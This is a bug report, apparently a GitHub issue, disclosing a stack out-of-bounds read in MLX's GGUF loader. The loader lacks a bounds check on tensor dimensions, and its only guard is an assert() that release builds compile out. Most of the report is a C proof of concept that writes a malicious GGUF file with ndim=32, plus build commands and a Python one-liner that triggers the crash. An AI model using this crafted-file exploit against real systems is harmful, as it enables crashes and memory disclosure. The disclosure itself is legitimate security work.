[BUG]  get_shape() has no bounds check allowing read of outside data structure

**Describe the bug**
  1. get_shape() has no bounds check (mlx/io/gguf.cpp:50-57)
  for (int i = tensor.ndim - 1; i >= 0; i--) {
      shape.push_back(tensor.dim[i]);  // no check that ndim <= 8
  }

  2. dim[] is fixed at 8 elements (vendored gguflib.h)
  #define GGUF_TENSOR_MAX_DIM 8
  uint64_t dim[GGUF_TENSOR_MAX_DIM];

  3. The only guard is an assert() (vendored gguflib.c:279)
  tensor->ndim = *num_dim;
  assert(tensor->ndim <= GGUF_TENSOR_MAX_DIM);  // compiled out with NDEBUG

  4. No NDEBUG override in the build (mlx/io/CMakeLists.txt:9-26) — gguflib is built as a plain static library with no flags to
  preserve asserts in release mode.

  5. Two call sites reach get_shape() with untrusted tensor data:
  - mlx/io/gguf.cpp:234 — non-quantized tensor loading
  - mlx/io/gguf_quants.cpp:112 — quantized tensor loading

6.  If you access dim[n] where n >= 8 you read the following data:

```
 typedef struct {
      const char *name;                   //  8 bytes
      size_t namelen;                     //  8 bytes
      uint32_t type;                      //  4 bytes
      uint32_t ndim;                      //  4 bytes
      uint64_t dim[8];                    // 64 bytes  <-- dim[0] through dim[7]
      // --- everything below is what dim[8+] reads ---
      uint64_t offset;                    //  8 bytes  → dim[8]
      uint64_t bsize;                     //  8 bytes  → dim[9]
      uint64_t num_weights;               //  8 bytes  → dim[10]
      uint8_t *weights_data;              //  8 bytes  → dim[11]
      // --- past the struct boundary ---
      // dim[12..31] → stack frame: local variables, saved registers,
      //               return address, caller's frame, etc.
  } gguf_tensor;

```

**To Reproduce**
```c
/*
 * POC: GGUF Tensor ndim Stack Out-of-Bounds Read (ADVISORY-2026-001 / V1-002)
 *
 * Demonstrates two vulnerabilities triggered by a crafted GGUF with ndim > 8:
 *
 *   Part A: Shows that assert() is a no-op in release builds (NDEBUG),
 *           leaving ndim completely unchecked in gguflib.c.
 *
 *   Part B: Directly demonstrates the OOB read in MLX's get_shape().
 *           A gguf_tensor is placed on the stack with ndim=32 but only
 *           dim[0..7] initialized. The get_shape() loop reads dim[8..31],
 *           which are whatever happens to be adjacent in memory.
 *
 *   Part C: Generates a minimal malicious GGUF file (crash_v1002.gguf)
 *           that can be loaded with actual MLX to trigger the real bug:
 *             python3 -c "import mlx.core as mx; mx.load_gguf('crash_v1002.gguf')"
 *
 * Build & run:
 *   cc -DNDEBUG -O2 -o poc_ndim_oob poc_ndim_oob.c && ./poc_ndim_oob
 *
 * Optional — build with AddressSanitizer for formal OOB detection:
 *   cc -DNDEBUG -O0 -fsanitize=address -o poc_ndim_oob_asan poc_ndim_oob.c
 *   ./poc_ndim_oob_asan
 */

#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ===== Replica of gguflib structures (from gguflib.h) ===== */

#define GGUF_TENSOR_MAX_DIM 8

typedef struct {
    const char *name;
    size_t namelen;
    uint32_t type;
    uint32_t ndim;
    uint64_t dim[GGUF_TENSOR_MAX_DIM]; /* Fixed 8-element array */
    uint64_t offset;
    uint64_t bsize;
    uint64_t num_weights;
    uint8_t *weights_data;
} gguf_tensor;

/* ===== Part A: Demonstrate assert() is a no-op ===== */

static void demo_assert_noop(void) {
    printf("--- Part A: assert() behavior under NDEBUG ---\n\n");

    uint32_t ndim = 32;

    /*
     * This is the exact check from gguflib.c ~line 279:
     *     assert(tensor->ndim <= GGUF_TENSOR_MAX_DIM);
     */
    assert(ndim <= GGUF_TENSOR_MAX_DIM);

#ifdef NDEBUG
    printf("[!] NDEBUG is defined -- assert() compiled to nothing.\n");
    printf("    ndim=%u passed through with ZERO validation.\n", ndim);
    printf("    This is the root cause: gguflib trusts assert() for\n");
    printf("    untrusted input validation.\n\n");
#else
    /* If we reach here without NDEBUG, assert would have aborted above. */
    printf("[*] NDEBUG is NOT defined -- assert() is active.\n");
    printf("    Rebuild with -DNDEBUG to simulate release behavior.\n\n");
#endif
}

/* ===== Part B: Demonstrate OOB read in get_shape() ===== */

/*
 * We place a canary struct right after the tensor on the stack to make
 * the OOB read visible. In real MLX, whatever is adjacent on the stack
 * (return addresses, saved registers, local variables) gets read instead.
 */
typedef struct {
    gguf_tensor tensor;
    /* These 24 uint64_t values sit right after tensor.dim[7] in memory,
     * occupying the space that dim[8..31] would index into.
     * (Some are the struct's own trailing fields; the rest overflow.) */
    uint64_t canary[24];
} stacked_layout;

static void demo_get_shape_oob(void) {
    printf("--- Part B: OOB read in get_shape() ---\n\n");

    stacked_layout layout;
    memset(&layout, 0, sizeof(layout));

    /* Initialize the tensor as if gguflib parsed it (but without the
     * OOB write -- we're isolating the get_shape() read side). */
    layout.tensor.ndim = 32;  /* Attacker-controlled from GGUF file */

    /* Fill the valid dim[0..7] with recognizable values */
    for (int i = 0; i < GGUF_TENSOR_MAX_DIM; i++) {
        layout.tensor.dim[i] = 100 + i;  /* 100, 101, ..., 107 */
    }

    /* Fill canary region with a distinct pattern so we can see the OOB */
    for (int i = 0; i < 24; i++) {
        layout.canary[i] = 0xDEADBEEF00000000ULL | (uint64_t)i;
    }

    /*
     * This is the vulnerable loop from mlx/io/gguf.cpp lines 50-57:
     *
     *   Shape get_shape(const gguf_tensor& tensor) {
     *     Shape shape;
     *     for (int i = tensor.ndim - 1; i >= 0; i--) {
     *       shape.push_back(tensor.dim[i]);
     *     }
     *     return shape;
     *   }
     *
     * We replicate it here, iterating forward for readability:
     */
    printf("[*] get_shape() iterates ndim=%u times over dim[%d] array:\n\n",
           layout.tensor.ndim, GGUF_TENSOR_MAX_DIM);
    printf("    %-8s %-20s %s\n", "Index", "Value", "Status");
    printf("    %-8s %-20s %s\n", "-----", "-----", "------");

    for (int i = (int)layout.tensor.ndim - 1; i >= 0; i--) {
        uint64_t val = layout.tensor.dim[i]; /* OOB read when i >= 8 */

        if (i < GGUF_TENSOR_MAX_DIM) {
            printf("    dim[%2d]  %-20llu  OK (valid element)\n",
                   i, (unsigned long long)val);
        } else {
            printf("    dim[%2d]  0x%016llx   ** OOB READ — adjacent memory! **\n",
                   i, (unsigned long long)val);
        }
    }

    printf("\n[!] The %d lines marked OOB read memory beyond the dim[] array.\n",
           32 - GGUF_TENSOR_MAX_DIM);
    printf("    In real MLX, these would be stack variables, return addresses,\n");
    printf("    or other struct members — an information disclosure or crash.\n\n");
}

/* ===== Part C: Generate a malicious GGUF file ===== */

static void write_le32(uint8_t *buf, uint32_t val) {
    buf[0] = (uint8_t)(val);
    buf[1] = (uint8_t)(val >> 8);
    buf[2] = (uint8_t)(val >> 16);
    buf[3] = (uint8_t)(val >> 24);
}

static void write_le64(uint8_t *buf, uint64_t val) {
    for (int i = 0; i < 8; i++)
        buf[i] = (uint8_t)(val >> (i * 8));
}

#define MALICIOUS_NDIM 32
#define TENSOR_NAME "weight"
#define ALIGNMENT 32

static void generate_gguf(const char *path) {
    printf("--- Part C: Generate malicious GGUF file ---\n\n");

    size_t name_len = strlen(TENSOR_NAME);
    size_t header_size = 4 + 4 + 8 + 8;
    size_t tensor_info_size = 8 + name_len + 4 + (8 * MALICIOUS_NDIM) + 4 + 8;
    size_t info_end = header_size + tensor_info_size;
    size_t data_start = (info_end + ALIGNMENT - 1) & ~(size_t)(ALIGNMENT - 1);
    size_t total_size = data_start + 4; /* 1 F32 element */

    uint8_t *buf = (uint8_t *)calloc(1, total_size);
    if (!buf) { perror("calloc"); exit(1); }

    size_t off = 0;

    /* GGUF header (v3) */
    memcpy(buf + off, "GGUF", 4);               off += 4;
    write_le32(buf + off, 3);                    off += 4;
    write_le64(buf + off, 1);                    off += 8;  /* 1 tensor */
    write_le64(buf + off, 0);                    off += 8;  /* 0 metadata KV */

    /* Tensor info: name */
    write_le64(buf + off, name_len);             off += 8;
    memcpy(buf + off, TENSOR_NAME, name_len);    off += name_len;

    /* Tensor info: ndim = 32 (MALICIOUS — exceeds GGUF_TENSOR_MAX_DIM) */
    write_le32(buf + off, MALICIOUS_NDIM);       off += 4;

    /* 32 dimension values (only first 8 fit in the struct) */
    for (uint32_t i = 0; i < MALICIOUS_NDIM; i++) {
        write_le64(buf + off, (i < 8) ? 1 : 0xDEAD0000 + i);
        off += 8;
    }

    /* Tensor type = F32 (0) */
    write_le32(buf + off, 0);                    off += 4;

    /* Tensor data offset = 0 */
    write_le64(buf + off, 0);                    off += 8;

    /* Tensor data: single float 1.0f */
    float one = 1.0f;
    memcpy(buf + data_start, &one, 4);

    FILE *fp = fopen(path, "wb");
    if (!fp) { perror("fopen"); exit(1); }
    fwrite(buf, 1, total_size, fp);
    fclose(fp);
    free(buf);

    printf("[+] Written: %s (%zu bytes)\n", path, total_size);
    printf("    Tensor 'weight' has ndim=%d (max valid=%d)\n",
           MALICIOUS_NDIM, GGUF_TENSOR_MAX_DIM);
    printf("\n    To trigger in real MLX:\n");
    printf("      python3 -c \"import mlx.core as mx; mx.load('%s')\"\n\n", path);
}

/* ===== Main ===== */

int main(void) {
    printf("=========================================================\n");
    printf("  ADVISORY-2026-001 POC: GGUF Tensor ndim OOB Read\n");
    printf("  Affects: MLX <= commit befe42d3\n");
    printf("=========================================================\n\n");

    demo_assert_noop();
    demo_get_shape_oob();
    generate_gguf("crash_v1002.gguf");

    return 0;
}

```

Compile:

```bash
 cc -DNDEBUG -O2 -o poc_ndim_oob poc_ndim_oob.c && ./poc_ndim_oob
```
 **Optional:** build with AddressSanitizer for formal OOB detection:
```bash
 cc -DNDEBUG -O0 -fsanitize=address -o poc_ndim_oob_asan poc_ndim_oob.c
 ```

run: ```./poc_ndim_oob_asan```

Reproducable in Python as well:
``` python3 -c "import mlx.core as mx; mx.load('crash_v1002.gguf')"```


**Expected behavior**

Check out https://github.com/ggml-org/ggml/blob/master/docs/gguf.md

If you scroll down you will see, as of today, dimensions should be <= 4.  8 is excessive (unless it changes in gguf) 

```cpp

struct gguf_tensor_info_t {
    // The name of the tensor. It is a standard GGUF string, with the caveat that
    // it must be at most 64 bytes long.
    gguf_string_t name;
    // The number of dimensions in the tensor.
    // Currently at most 4, but this may change in the future.
    uint32_t n_dimensions;
    // The dimensions of the tensor.
    uint64_t dimensions[n_dimensions];
    // The type of the tensor.
    ggml_type type;
    // The offset of the tensor's data in this file in bytes.
    //
    // This offset is relative to `tensor_data`, not to the start
    // of the file, to make it easier for writers to write the file.
    // Readers should consider exposing this offset relative to the
    // file to make it easier to read the data.
    //
    // Must be a multiple of `ALIGNMENT`. That is, `align_offset(offset) == offset`.
    uint64_t offset;
};
```

**Desktop (please complete the following information):**
 - OS Version: MacOS 26.3.1 (a) M2 16GB


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[BUG] get_shape() has no bounds check allowing read of outside data structure #3358

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

[BUG] get_shape() has no bounds check allowing read of outside data structure #3358

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions